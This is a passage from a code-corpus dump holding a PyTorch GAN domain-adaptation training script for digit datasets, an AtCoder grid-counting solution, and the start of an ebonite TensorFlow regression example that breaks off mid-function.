#### Dataset preprocessing\r\n\r\n# In[4]:\r\n\r\n\r\nDataAttDict = {\r\n'mnist': (1,28),\r\n'mnistm': (3,28),\r\n'usps': (1,28),\r\n'svhn': (3,32),\r\n}\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nclass Logger(object):\r\n def __init__(self, filepath = \"./log.txt\", mode = \"w\", stdout = None):\r\n if stdout==None:\r\n self.terminal = sys.stdout\r\n else:\r\n self.terminal = stdout\r\n os.makedirs(dirname(filepath), exist_ok=True)\r\n self.log = open(filepath, mode)\r\n\r\n def write(self, message):\r\n self.terminal.write(message)\r\n self.log.write(message)\r\n self.log.flush()\r\n os.fsync(self.log)\r\n\r\n def flush(self):\r\n #this flush method is needed for python 3 compatibility.\r\n #this handles the flush command by doing nothing.\r\n #you might want to specify some extra behavior here.\r\n pass\r\n\r\n# def InfIter(_loader):\r\n# return iter(InfIter_C(_loader))\r\n\r\nclass InfIter:\r\n def __init__(self,_loader):\r\n self._loader = _loader\r\n self._iter = iter(_loader)\r\n def __iter__(self):\r\n return self\r\n def __next__(self):\r\n try:\r\n return self._iter.next()\r\n except StopIteration:\r\n self._iter = iter(self._loader)\r\n return self._iter.next()\r\n\r\n##### define dataset\r\n\"\"\"Dataset setting and data loader for MNIST-M.\r\nModified from\r\nhttps://github.com/pytorch/vision/blob/master/torchvision/datasets/mnist.py\r\nCREDIT: https://github.com/corenel\r\n\"\"\"\r\nimport errno\r\nimport os\r\n\r\nimport torch\r\nimport torch.utils.data as data\r\nfrom PIL import Image\r\n\r\n\r\nclass MNISTM(data.Dataset):\r\n \"\"\"`MNIST-M Dataset.\"\"\"\r\n\r\n url = \"https://github.com/VanushVaswani/keras_mnistm/releases/download/1.0/keras_mnistm.pkl.gz\"\r\n\r\n raw_folder = 'raw'\r\n processed_folder = 'processed'\r\n training_file = 'mnist_m_train.pt'\r\n test_file = 'mnist_m_test.pt'\r\n\r\n def __init__(self,\r\n root, mnist_root=\"data\",\r\n train=True,\r\n transform=None, target_transform=None,\r\n download=False):\r\n \"\"\"Init MNIST-M dataset.\"\"\"\r\n super(MNISTM, self).__init__()\r\n self.root = os.path.expanduser(root)\r\n self.mnist_root = os.path.expanduser(mnist_root)\r\n self.transform = transform\r\n self.target_transform = target_transform\r\n self.train = train # training set or test set\r\n\r\n if download:\r\n self.download()\r\n\r\n if not self._check_exists():\r\n raise RuntimeError('Dataset not found.' +\r\n ' You can use download=True to download it')\r\n\r\n if self.train:\r\n self.train_data, self.train_labels = torch.load(os.path.join(self.root,\r\n self.processed_folder,\r\n self.training_file))\r\n else:\r\n self.test_data, self.test_labels = torch.load(os.path.join(self.root,\r\n self.processed_folder,\r\n self.test_file))\r\n\r\n def __getitem__(self, index):\r\n \"\"\"Get images and target for data loader.\r\n Args:\r\n index (int): Index\r\n Returns:\r\n tuple: (image, target) where target is index of the target class.\r\n \"\"\"\r\n if self.train:\r\n img, target = self.train_data[index], self.train_labels[index]\r\n else:\r\n img, target = self.test_data[index], self.test_labels[index]\r\n\r\n # doing this so that it is consistent with all other datasets\r\n # to return a PIL Image\r\n img = Image.fromarray(img.squeeze().numpy(), mode='RGB')\r\n\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n\r\n if self.target_transform is not None:\r\n target = self.target_transform(target)\r\n\r\n return img, target\r\n\r\n def __len__(self):\r\n \"\"\"Return size of dataset.\"\"\"\r\n if self.train:\r\n return len(self.train_data)\r\n else:\r\n return len(self.test_data)\r\n\r\n def _check_exists(self):\r\n return os.path.exists(os.path.join(self.root,\r\n self.processed_folder,\r\n self.training_file)) and \\\r\n os.path.exists(os.path.join(self.root,\r\n self.processed_folder,\r\n self.test_file))\r\n\r\n def download(self):\r\n \"\"\"Download the MNIST data.\"\"\"\r\n # import essential packages\r\n from six.moves import urllib\r\n import gzip\r\n import pickle\r\n from torchvision import datasets\r\n\r\n # check if dataset already exists\r\n if self._check_exists():\r\n return\r\n\r\n # make data directories\r\n try:\r\n os.makedirs(os.path.join(self.root, self.raw_folder))\r\n os.makedirs(os.path.join(self.root, self.processed_folder))\r\n except OSError as e:\r\n if e.errno == errno.EEXIST:\r\n pass\r\n else:\r\n raise\r\n\r\n # download pkl files\r\n print('Downloading ' + self.url)\r\n filename = self.url.rpartition('/')[2]\r\n file_path = os.path.join(self.root, self.raw_folder, filename)\r\n if not os.path.exists(file_path.replace('.gz', '')):\r\n data = urllib.request.urlopen(self.url)\r\n with open(file_path, 'wb') as f:\r\n f.write(data.read())\r\n with open(file_path.replace('.gz', ''), 'wb') as out_f, gzip.GzipFile(file_path) as zip_f:\r\n out_f.write(zip_f.read())\r\n os.unlink(file_path)\r\n\r\n # process and save as torch files\r\n print('Processing...')\r\n\r\n # load MNIST-M images from pkl file\r\n with open(file_path.replace('.gz', ''), \"rb\") as f:\r\n mnist_m_data = pickle.load(f, encoding='bytes')\r\n mnist_m_train_data = torch.ByteTensor(mnist_m_data[b'train'])\r\n mnist_m_test_data = torch.ByteTensor(mnist_m_data[b'test'])\r\n\r\n # get MNIST labels\r\n mnist_train_labels = datasets.MNIST(root=self.mnist_root,\r\n train=True,\r\n download=True).train_labels\r\n mnist_test_labels = datasets.MNIST(root=self.mnist_root,\r\n train=False,\r\n download=True).test_labels\r\n\r\n # save MNIST-M dataset\r\n training_set = (mnist_m_train_data, mnist_train_labels)\r\n test_set = (mnist_m_test_data, mnist_test_labels)\r\n with open(os.path.join(self.root,\r\n self.processed_folder,\r\n self.training_file), 'wb') as f:\r\n torch.save(training_set, f)\r\n with open(os.path.join(self.root,\r\n self.processed_folder,\r\n self.test_file), 'wb') as f:\r\n torch.save(test_set, f)\r\n\r\n print('Done!')\r\n\r\n\r\nclass USPS(data.Dataset):\r\n \"\"\"USPS Dataset.\r\n Args:\r\n root (string): Root directory of dataset where dataset file exist.\r\n train (bool, optional): If True, resample from dataset randomly.\r\n download (bool, optional): If true, downloads the dataset\r\n from the internet and puts it in root directory.\r\n If dataset is already downloaded, it is not downloaded again.\r\n transform (callable, optional): A function/transform that takes in\r\n an PIL image and returns a transformed version.\r\n E.g, ``transforms.RandomCrop``\r\n \"\"\"\r\n\r\n url = \"https://raw.githubusercontent.com/mingyuliutw/CoGAN/master/cogan_pytorch/data/uspssample/usps_28x28.pkl\"\r\n\r\n def __init__(self, root, train=True, transform=None, download=False):\r\n \"\"\"Init USPS dataset.\"\"\"\r\n # init params\r\n self.root = os.path.expanduser(root)\r\n self.filename = \"usps_28x28.pkl\"\r\n self.train = train\r\n # Num of Train = 7438, Num ot Test 1860\r\n self.transform = transform\r\n self.dataset_size = None\r\n\r\n # download dataset.\r\n if download:\r\n self.download()\r\n if not self._check_exists():\r\n raise RuntimeError(\"Dataset not found.\" +\r\n \" You can use download=True to download it\")\r\n\r\n self.train_data, self.train_labels = self.load_samples()\r\n if self.train:\r\n total_num_samples = self.train_labels.shape[0]\r\n indices = np.arange(total_num_samples)\r\n np.random.shuffle(indices)\r\n self.train_data = self.train_data[indices[0:self.dataset_size], ::]\r\n self.train_labels = self.train_labels[indices[0:self.dataset_size]]\r\n self.train_data = self.train_data.transpose(\r\n (0, 2, 3, 1)) # convert to HWC\r\n\r\n def __getitem__(self, index):\r\n \"\"\"Get images and target for data loader.\r\n Args:\r\n index (int): Index\r\n Returns:\r\n tuple: (image, target) where target is index of the target class.\r\n \"\"\"\r\n img, label = self.train_data[index, ::], self.train_labels[index]\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n label = np.long(label)\r\n # label = torch.LongTensor([np.int64(label).item()])\r\n # label = torch.FloatTensor([label.item()])\r\n return img, label\r\n\r\n def __len__(self):\r\n \"\"\"Return size of dataset.\"\"\"\r\n return self.dataset_size\r\n\r\n def _check_exists(self):\r\n \"\"\"Check if dataset is download and in right place.\"\"\"\r\n return os.path.exists(os.path.join(self.root, self.filename))\r\n\r\n def download(self):\r\n \"\"\"Download dataset.\"\"\"\r\n filename = os.path.join(self.root, self.filename)\r\n dirname = os.path.dirname(filename)\r\n if not os.path.isdir(dirname):\r\n os.makedirs(dirname)\r\n if os.path.isfile(filename):\r\n return\r\n print(\"Download %s to %s\" % (self.url, os.path.abspath(filename)))\r\n urllib.request.urlretrieve(self.url, filename)\r\n print(\"[DONE]\")\r\n return\r\n\r\n def load_samples(self):\r\n \"\"\"Load sample images from dataset.\"\"\"\r\n filename = os.path.join(self.root, self.filename)\r\n f = gzip.open(filename, \"rb\")\r\n data_set = pickle.load(f, encoding=\"bytes\")\r\n f.close()\r\n if self.train:\r\n images = data_set[0][0]\r\n labels = data_set[0][1]\r\n self.dataset_size = labels.shape[0]\r\n else:\r\n images = data_set[1][0]\r\n labels = data_set[1][1]\r\n self.dataset_size = labels.shape[0]\r\n return images, labels\r\n\r\n\r\n# In[18]:\r\n\r\n\r\ndef createDataset(dataname, train):\r\n if dataname == \"mnist\":\r\n return dset.MNIST(root=root_dir+'/mnist', train=train, download=True,\r\n transform=transforms.Compose([\r\n transforms.ToTensor()\r\n ]))\r\n if dataname == \"mnistm\":\r\n return MNISTM(root=root_dir+'/mnistm', mnist_root=dataroot+'/mnist', train=train, download=True,\r\n transform=transforms.Compose([\r\n transforms.ToTensor()\r\n ]))\r\n if dataname == \"usps\":\r\n return USPS(root=root_dir+'/usps', train=train, download=True,\r\n transform=transforms.Compose([\r\n transforms.ToTensor()\r\n ]))\r\n if dataname == \"svhn\":\r\n return dset.SVHN(root=root_dir+'/svhn', split=(\"train\" if train else \"test\"), download=True,\r\n transform=transforms.Compose([\r\n transforms.Resize(28),\r\n transforms.ToTensor()\r\n ]))\r\n\r\n\r\n# #### Loss functions\r\n\r\n# In[7]:\r\n\r\n\r\ndef loss(x):\r\n return (F.softplus(x)).mean()\r\n\r\n\r\n# #### Neural net class\r\n\r\n# In[33]:\r\n\r\n\r\nclass CoDis28x28(nn.Module):\r\n def __init__(self, ch_s, imsize_s, ch_t, imsize_t):\r\n super(CoDis28x28, self).__init__()\r\n self.conv0_s = nn.Conv2d(ch_s, 20, kernel_size=5, stride=1, padding=0)\r\n self.conv0_t = nn.Conv2d(ch_t, 20, kernel_size=5, stride=1, padding=0)\r\n self.pool0 = nn.MaxPool2d(kernel_size=2)\r\n self.conv1 = nn.Conv2d(20, 50, kernel_size=5, stride=1, padding=0)\r\n self.pool1 = nn.MaxPool2d(kernel_size=2)\r\n self.conv2 = nn.Conv2d(50, 500, kernel_size=4, stride=1, padding=0)\r\n self.prelu2 = nn.PReLU()\r\n self.conv30_s = nn.Conv2d(500, 100, kernel_size=1, stride=1, padding=0)\r\n self.prelu3_s = nn.PReLU()\r\n self.conv31_s = nn.Conv2d(100, 1, kernel_size=1, stride=1, padding=0)\r\n self.conv30_t = nn.Conv2d(500, 100, kernel_size=1, stride=1, padding=0)\r\n self.prelu3_t = nn.PReLU()\r\n self.conv31_t = nn.Conv2d(100, 1, kernel_size=1, stride=1, padding=0)\r\n self.conv_cl = nn.Conv2d(500, 10, kernel_size=1, stride=1, padding=0)\r\n\r\n def forward(self, x_s, x_t):\r\n h0_s = self.pool0(self.conv0_s(x_s))\r\n h0_t = self.pool0(self.conv0_t(x_t))\r\n h1_s = self.pool1(self.conv1(h0_s))\r\n h1_t = self.pool1(self.conv1(h0_t))\r\n h2_s = self.prelu2(self.conv2(h1_s))\r\n h2_t = self.prelu2(self.conv2(h1_t))\r\n h3_s = self.conv31_s(self.prelu3_s(self.conv30_s(h2_s)))\r\n h3_t = self.conv31_t(self.prelu3_t(self.conv30_t(h2_t)))\r\n return h3_s, h2_s, h0_s, h3_t, h2_t, h0_t\r\n\r\n def pred_s(self, x_s):\r\n h0_s = self.pool0(self.conv0_s(x_s))\r\n h1_s = self.pool1(self.conv1(h0_s))\r\n h2_s = self.prelu2(self.conv2(h1_s))\r\n h3_s = self.conv_cl(h2_s)\r\n return h3_s.squeeze(), h2_s.squeeze()\r\n\r\n def pred_t(self, x_t):\r\n h0_t = self.pool0(self.conv0_t(x_t))\r\n h1_t = self.pool1(self.conv1(h0_t))\r\n h2_t = self.prelu2(self.conv2(h1_t))\r\n h3_t = self.conv_cl(h2_t)\r\n return h3_t.squeeze(), h2_t.squeeze()\r\n\r\n def pred_fromrep(self, h2):\r\n return self.conv_cl(h2).squeeze()\r\n\r\n\r\n# Generator Model\r\nclass CoGen28x28(nn.Module):\r\n def __init__(self, ch_s, imsize_s, ch_t, imsize_t, zsize):\r\n super(CoGen28x28, self).__init__()\r\n self.dconv0 = nn.ConvTranspose2d(zsize, 1024, kernel_size=4, stride=1)\r\n self.bn0 = nn.BatchNorm2d(1024, affine=False)\r\n self.prelu0 = nn.PReLU()\r\n self.dconv1 = nn.ConvTranspose2d(1024, 512, kernel_size=3, stride=2, padding=1)\r\n self.bn1 = nn.BatchNorm2d(512, affine=False)\r\n self.prelu1 = nn.PReLU()\r\n self.dconv2 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1)\r\n self.bn2 = nn.BatchNorm2d(256, affine=False)\r\n self.prelu2 = nn.PReLU()\r\n self.dconv3 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1)\r\n self.bn3 = nn.BatchNorm2d(128, affine=False)\r\n self.prelu3 = nn.PReLU()\r\n self.dconv4_s = nn.ConvTranspose2d(128, ch_s, kernel_size=6, stride=1, padding=1)\r\n self.dconv4_t = nn.ConvTranspose2d(128, ch_t, kernel_size=6, stride=1, padding=1)\r\n self.sig4_s = nn.Sigmoid()\r\n self.sig4_t = nn.Sigmoid()\r\n\r\n def forward(self, z):\r\n z = z.view(z.size(0), z.size(1), 1, 1)\r\n h0 = self.prelu0(self.bn0(self.dconv0(z)))\r\n h1 = self.prelu1(self.bn1(self.dconv1(h0)))\r\n h2 = self.prelu2(self.bn2(self.dconv2(h1)))\r\n h3 = self.prelu3(self.bn3(self.dconv3(h2)))\r\n out_s = self.sig4_s(self.dconv4_s(h3))\r\n out_t = self.sig4_t(self.dconv4_t(h3))\r\n return out_s, out_t\r\n\r\n\r\n# #### To be determined\r\n\r\n# In[9]:\r\n\r\n\r\ndef xavier_weights_init(m):\r\n classname = m.__class__.__name__\r\n # print(classname)\r\n if classname.find('Conv') != -1:\r\n init.xavier_uniform_(m.weight, gain=np.sqrt(2))\r\n init.constant_(m.bias, 0.1)\r\n\r\nclass C_contour(nn.Module):\r\n def __init__(self):\r\n super(C_contour, self).__init__()\r\n self.L1 = nn.Conv2d(3, 1, 3, bias=False)\r\n C1 = np.array([[-1,0,1],[-2,0,2], [-1,0,1]])\r\n C1 = torch.from_numpy(C1)\r\n list(self.L1.parameters())[0].data[0,:,:,:] = C1.unsqueeze(0)\r\n list(self.L1.parameters())[0].requires_grad = False\r\n\r\n self.L2 = nn.Conv2d(3, 1, 3, bias=False)\r\n C2 = np.array([[1,2,1],[0,0,0], [-1,-2,-1]])\r\n C2 = torch.from_numpy(C2)\r\n list(self.L2.parameters())[0].data[0,:,:,:] = C2.unsqueeze(0)\r\n list(self.L2.parameters())[0].requires_grad = False\r\n\r\n def forward(self, x, y):\r\n if x.shape[1] == 1:\r\n x = torch.cat([x,x,x],1)\r\n if y.shape[1] == 1:\r\n y = torch.cat([y,y,y],1)\r\n imgx1 = self.L1(x)\r\n imgx2 = self.L2(x)\r\n\r\n imgy1 = self.L1(y)\r\n imgy2 = self.L2(y)\r\n# img = img.view(img.shape[0], *img_shape)\r\n return torch.norm(imgx1-imgy1)+torch.norm(imgx2-imgy2)\r\n\r\n\r\n# ##### Test function\r\n\r\n# In[10]:\r\n\r\n\r\ndef test_f(verbose = True, print_period = 100):\r\n # VALIDATION\r\n j = 0\r\n cum_acc = 0\r\n total_len = 0\r\n\r\n netCl.eval()\r\n for y, y_label in dataloader_y:\r\n j = j+1\r\n\r\n y = y.to(device)\r\n y_label = y_label.to(device)\r\n\r\n # compute output\r\n outputs, _ = netCl.pred_t(y)\r\n test_loss = criterion(outputs, y_label)\r\n\r\n pred = torch.argmax(outputs,dim=-1)\r\n test_acc = torch.sum(pred==y_label).item()\r\n cum_acc = cum_acc+test_acc\r\n test_acc = test_acc/len(pred)\r\n total_len += len(pred)\r\n if j%print_period==0 and verbose:\r\n print('Iter: [%d/%d], Test Loss: %.8f, Test Acc: %.2f' % (j,len(dataloader_y),test_loss, test_acc))\r\n print(' Test acc for the epoch: %.8f\\n##############################################' % (cum_acc/total_len))\r\n return cum_acc/total_len\r\n\r\n\r\n# ##### Visualization and learning rate update\r\n\r\n# In[53]:\r\n\r\n\r\ndef show_tsne(xr, xl, yr, yl, xfr, xfl, yfr, yfl, epoch):\r\n import sklearn\r\n from sklearn.manifold import TSNE\r\n tsne = TSNE(n_components=2, random_state=0)\r\n X = np.concatenate((xr, yr, xfr, yfr), axis=0)\r\n X_2d = tsne.fit_transform(X)\r\n from matplotlib import pyplot as plt\r\n plt.figure(figsize=(6, 5))\r\n colors = np.array(['r', 'g', 'b', 'c', 'm', 'y', 'k', 'grey', 'orange', 'purple'])\r\n plt.scatter(X_2d[:batchsize, 0], X_2d[:batchsize, 1], c=colors[xl], marker=\"o\", label=[\"source\"])\r\n for i in range(batchsize):\r\n plt.text(X_2d[batchsize+i, 0], X_2d[batchsize+i, 1], str(yl[i]), color=colors[yl[i]], label=\"target\")\r\n plt.scatter(X_2d[batchsize:batchsize*2, 0], X_2d[batchsize:batchsize*2, 1], c=colors[yl], marker=\"*\", label=[\"target\"])\r\n plt.scatter(X_2d[batchsize*2:batchsize*3, 0], X_2d[batchsize*2:batchsize*3, 1], marker=\"_\", c=colors[xfl], label=\"source fake\")\r\n plt.scatter(X_2d[batchsize*3:batchsize*4, 0], X_2d[batchsize*3:batchsize*4, 1], marker=\"+\", c=colors[yfl], label=\"target fake\")\r\n plt.legend()\r\n plt.savefig(experiment +'/tsne_%05d.pdf'%(epoch), bbox_inches='tight',format=\"pdf\", dpi = 300)\r\n plt.close()\r\n\r\n\r\n\r\n# ## Main\r\n\r\n# ##### Directories organization\r\n\r\n# In[13]:\r\n\r\n\r\n\r\nname = s + \"two\" + t\r\nexperiment = \"Experiment_DASPOT/\" + name\r\nos.system('mkdir {0}'.format(experiment))\r\nstdout_backup = sys.stdout\r\nsys.stdout = Logger(experiment +\"/log.txt\",\"w\", stdout_backup)\r\nmanualseed = random.randint(1, 10000) \r\n\r\nrandom.seed(manualseed)\r\ntorch.manual_seed(manualseed)\r\n\r\n\r\n# ##### Cuda\r\n\r\n# In[14]:\r\n\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device(\"cuda:0\")\r\n import torch.backends.cudnn as cudnn\r\n cudnn.benchmark = True\r\nelse:\r\n device = torch.device(\"cpu\")\r\n\r\n\r\n# ##### Dataset loaders\r\n\r\n# In[19]:\r\n\r\n\r\ndataset1 = createDataset(s, True)\r\ndataset2 = createDataset(t, True)\r\ndataset3 = createDataset(t, False)\r\n\r\ndataloader_x = torch.utils.data.DataLoader(dataset1, batch_size=batchsize,\r\n shuffle=True, num_workers=int(procs), pin_memory=True, drop_last = True)\r\ndataloader_y_ans = torch.utils.data.DataLoader(dataset2, batch_size=batchsize,\r\n shuffle=True, num_workers=int(procs), pin_memory=True, drop_last = True)\r\ndataloader_y = torch.utils.data.DataLoader(dataset3, batch_size=batchsize,\r\n shuffle=True, num_workers=int(procs), pin_memory=True)\r\n\r\n\r\n# ##### Nets\r\n\r\n# In[21]:\r\n\r\n\r\nnetCl = CoDis28x28(*DataAttDict[s],*DataAttDict[t]).to(device)\r\nnetD_1 = nn.Conv2d(20, 1, kernel_size=12, stride=1, padding=0).to(device)\r\nnetD_2 = nn.Sequential(\r\n nn.Conv2d(500, 100, kernel_size=1, stride=1, padding=0),\r\n nn.PReLU(),\r\n nn.Conv2d(100, 1, kernel_size=1, stride=1, padding=0)\r\n ).to(device)\r\nnetGen = CoGen28x28(*DataAttDict[s],*DataAttDict[t], zsize=z_dim).to(device)\r\n\r\n\r\n# ##### Optimizer setup\r\n\r\n# In[26]:\r\n\r\n\r\noptimizerCl = optim.Adam([p for p in netCl.parameters() if p.requires_grad], lr=lrCl, betas=(beta1, beta2), weight_decay=weight_decay)\r\noptimizerD = optim.Adam([p for p in netD_1.parameters() if p.requires_grad]+[p for p in netD_2.parameters() if p.requires_grad], lr=lrCl, betas=(beta1, beta2), weight_decay=weight_decay)\r\noptimizerGen = optim.Adam([p for p in netGen.parameters() if p.requires_grad], lr=lrGen, betas=(beta1, beta2), weight_decay=weight_decay)\r\n\r\n\r\n# ##### Loss criterion \r\n\r\n# In[27]:\r\n\r\n\r\ncriterion = nn.CrossEntropyLoss()\r\nc_loss = C_contour().to(device)\r\n\r\n\r\n# ##### GAN training\r\n\r\n# In[ ]:\r\n\r\n\r\nbest_test_acc = 0\r\nx_noise = torch.randn(batchsize, z_dim).to(device)\r\nfixed_noise = x_noise\r\nfixed_x = None\r\nfixed_y = None\r\n\r\n\r\ny_iter = InfIter(dataloader_y_ans)\r\nx_iter = InfIter(dataloader_x)\r\nfor i in range(tot_iter):\r\n netCl.train()\r\n netD_1.train()\r\n netD_2.train()\r\n netGen.train()\r\n for in_iter in range(2):\r\n netCl.zero_grad()\r\n netD_1.zero_grad()\r\n netD_2.zero_grad()\r\n\r\n y, y_labels = next(y_iter)\r\n x, x_labels = next(x_iter)\r\n z = torch.randn(batchsize, z_dim).to(device)\r\n\r\n x = x.to(device)\r\n y = y.to(device)\r\n x_labels = x_labels.to(device)\r\n\r\n # GAN training\r\n x_f, y_f = netGen(z)\r\n x_3,x_2,x_1, y_3,y_2,y_1 = netCl(x,y)\r\n x_3_f,x_2_f,_, y_3_f,y_2_f,_ = netCl(x_f.detach(), y_f.detach())\r\n\r\n errD_xy = loss(netD_1(x_1.detach())) \r\n errD_xy += loss(-netD_1(y_1.detach())) \r\n errD_xy += loss(netD_2(x_2.detach())) \r\n errD_xy += loss(-netD_2(y_2.detach())) \r\n errD_xy.backward()\r\n optimizerD.step()\r\n\r\n errD_xy = loss(-netD_1(x_1)) \r\n errD_xy += loss(netD_1(y_1)) \r\n errD_xy += loss(-netD_2(x_2.detach())) \r\n errD_xy += loss(netD_2(y_2.detach())) \r\n\r\n\r\n errD_x_real = loss(x_3) \r\n errD_y_real = loss(y_3) \r\n errD_x_fake = loss(-x_3_f) \r\n errD_y_fake = loss(-y_3_f) \r\n D_x_real = x_3.mean().item()\r\n D_y_real = y_3.mean().item()\r\n D_x_fake = x_3_f.mean().item()\r\n D_y_fake = y_3_f.mean().item()\r\n\r\n x_out = netCl.pred_fromrep(x_2)\r\n #netCl.eval()\r\n x_out_f = netCl.pred_fromrep(x_2_f)\r\n #netCl.train()\r\n\r\n x_prob_fake = F.softmax(x_out_f, dim=1)\r\n x_maxprob_fake,x_label_fake = x_prob_fake.max(dim=1)\r\n select_indices = x_maxprob_fake>0.9\r\n ys_rep_fake = y_2_f[select_indices,:,:,:]\r\n if(ys_rep_fake.shape[0]==0):\r\n errCl_x = 0\r\n else:\r\n ys_label = x_label_fake[select_indices].detach()\r\n ys_out_fake = netCl.pred_fromrep(ys_rep_fake)\r\n if ys_rep_fake.shape[0]==1:\r\n ys_out_fake = ys_out_fake[None, :]\r\n errCl_x = criterion(ys_out_fake,ys_label) \r\n\r\n\r\n optloss = ((x_2_f-y_2_f)**2).sum()/batchsize \r\n errCl_x += criterion(x_out,x_labels) \r\n # GAN training for y\r\n lossCl = errD_x_real+errD_y_real+errD_x_fake+errD_y_fake+optloss+errCl_x+errD_xy\r\n lossCl.backward()\r\n optimizerCl.step()\r\n \r\n netGen.zero_grad()\r\n\r\n x_f, y_f = netGen(z)\r\n x_3_f,x_2_f,_,y_3_f,y_2_f,_ = netCl(x_f, y_f)\r\n errD_x_fake = loss(x_3_f) \r\n errD_y_fake = loss(y_3_f) \r\n D_x_fake = x_3_f.mean().item()\r\n D_y_fake = y_3_f.mean().item()\r\n\r\n # train optimal transport loss\r\n optloss = ((x_2_f-y_2_f)**2).sum()/batchsize #+ opt_contour_loss(x_fake,y_fake) * OPTlossscale2\r\n\r\n # Total Loss\r\n total_loss = errD_x_fake+errD_y_fake+optloss\r\n total_loss.backward()\r\n\r\n optimizerGen.step()\r\n\r\n pred = torch.argmax(x_out,dim=-1)\r\n train_acc = torch.sum(pred==x_labels).item()/len(pred)\r\n\r\n if i%100==0:\r\n print('Iter: [%d/%d] D_x_real: %.4f, D_x_fake: %.4f, D_y_real: %.4f, D_y_fake: %.4f, Loss_GANx: %.4f, Loss_GANy: %.4f, Loss_OPT: %.4f, Loss_P: %.4f, Train Accu: %.4f' %\r\n (i, tot_iter, D_x_real, D_x_fake, D_y_real, D_y_fake, errD_x_real.item()+errD_x_fake.item(), errD_y_real.item()+errD_y_fake.item(), optloss.item(), errCl_x.item(), train_acc))\r\n\r\n netCl.eval()\r\n # show tsne\r\n if i%t_iter == 0:\r\n if fixed_x is None:\r\n fixed_x = x.clone()\r\n fixed_y = y.clone()\r\n fixed_xlabel = x_labels.to(\"cpu\").long().numpy()\r\n fixed_ylabel = y_labels.to(\"cpu\").long().numpy()\r\n if fixed_x.shape[1] == fixed_y.shape[1]:\r\n real_images = torch.cat((fixed_x, fixed_y), 2)\r\n elif fixed_x.shape[1] == 1:\r\n real_images = torch.cat((torch.cat((fixed_x,fixed_x,fixed_x), 1), fixed_y), 2)\r\n else:\r\n real_images = torch.cat((fixed_x, torch.cat((fixed_y,fixed_y,fixed_y), 1)), 2)\r\n torchvision.utils.save_image(real_images.data, experiment +'/realimage.jpg')\r\n _,fixedx_rep = netCl.pred_s(fixed_x)\r\n _,fixedy_rep = netCl.pred_t(fixed_y)\r\n fixed_x_fake, fixed_y_fake = netGen(fixed_noise)\r\n fixedx_rep_fake_l,fixedx_rep_fake = netCl.pred_s(fixed_x_fake)\r\n fixedx_rep_fake_l = fixedx_rep_fake_l.argmax(dim=1)\r\n fixedy_rep_fake_l,fixedy_rep_fake = netCl.pred_t(fixed_y_fake)\r\n fixedy_rep_fake_l = fixedy_rep_fake_l.argmax(dim=1)\r\n if fixed_x_fake.shape[1] == fixed_y_fake.shape[1]:\r\n fake_images = torch.cat((fixed_x_fake, fixed_y_fake), 2)\r\n elif fixed_x_fake.shape[1] == 1:\r\n fake_images = torch.cat((torch.cat((fixed_x_fake,fixed_x_fake,fixed_x_fake), 1), fixed_y_fake), 2)\r\n else:\r\n fake_images = torch.cat((fixed_x_fake, torch.cat((fixed_y_fake,fixed_y_fake,fixed_y_fake), 1)), 2)\r\n torchvision.utils.save_image(fake_images.data, experiment +'/fakeimage_%05d.jpg'%(i))\r\n show_tsne(\r\n fixedx_rep.to(\"cpu\").detach().numpy(),\r\n fixed_xlabel,\r\n fixedy_rep.to(\"cpu\").detach().numpy(),\r\n fixed_ylabel,\r\n fixedx_rep_fake.to(\"cpu\").detach().numpy(),\r\n fixedx_rep_fake_l,\r\n fixedy_rep_fake.to(\"cpu\").detach().numpy(),\r\n fixedy_rep_fake_l,\r\n i)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"dayeont/ML_project","sub_path":"DASPOT.py","file_name":"DASPOT.py","file_ext":"py","file_size_in_byte":28605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9742337058","text":"#!/usr/bin/env python3\nfrom collections import Counter\nimport itertools\nimport copy\nfrom itertools import product\n\n\ndef count_black(array):\n flatten = itertools.chain.from_iterable(array)\n c = Counter(flatten)\n return c[\"#\"]\n\n\ndef red_row(array, i):\n length = len(array[0])\n array[i] = [\"r\"] * length\n return array\n\n\ndef red_col(array, j):\n for row in array:\n row[j] = \"r\"\n return array\n\n\nH, W, K = map(int, input().split())\nC = []\n\nfor _ in range(H):\n row = list(input())\n C.append(row)\n\ntotal = 0\n\nrow_select_patterns = product([True, False], repeat=H)\ncol_select_patterns = list(product([True, False], repeat=W))\n\nfor row_select_pattern in row_select_patterns:\n for col_select_pattern in col_select_patterns:\n c = copy.deepcopy(C)\n\n for i, i_flag in enumerate(row_select_pattern):\n for j, j_flag in enumerate(col_select_pattern):\n if i_flag:\n c = red_row(c, i)\n\n if j_flag:\n c = red_col(c, j)\n\n if count_black(c) == K:\n total += 1\n\nprint(total)\n","repo_name":"rmaruon/atcoder-workspace","sub_path":"contests/abc173/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18439782245","text":"\"\"\"This example shows how to use ebonite with tensorflow<2.0.0\"\"\"\n\nimport logging\nfrom typing import Dict, List, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\n\nimport ebonite\nfrom ebonite.runtime import run_model_server\n\ntf_logger = logging.getLogger('tensorflow')\ntf_logger.setLevel(logging.ERROR)\n\n\ndef train_regression() -> Tuple[tf.Session, Union[tf.Tensor, List[tf.Tensor]], Dict[tf.Tensor, np.array]]:\n \"\"\"This function emulates data scientist's work. It produces a tf.Session with trained regression model and\n some sample data in feed_dict format\"\"\"\n learning_rate = 0.01\n training_epochs = 10\n n_samples = 20\n\n weight = 0.5\n bias = -2\n\n rng = np.random\n\n train_X = rng.uniform(-10, 10, (n_samples,))\n train_Y = train_X * weight + bias + rng.uniform(-0.1, 0.1, train_X.shape)\n\n X = tf.placeholder(\"float\", name='X')\n Y = tf.placeholder(\"float\", name='y')\n W = tf.Variable(rng.randn(), name=\"weight\")\n b = tf.Variable(rng.randn(), name=\"bias\")\n\n pred = tf.add(tf.multiply(X, W), b)\n mse = tf.reduce_sum(tf.pow(pred - Y, 2)) / (2 * n_samples)\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(mse)\n\n sess = tf.Session()\n\n # Run the initializer\n 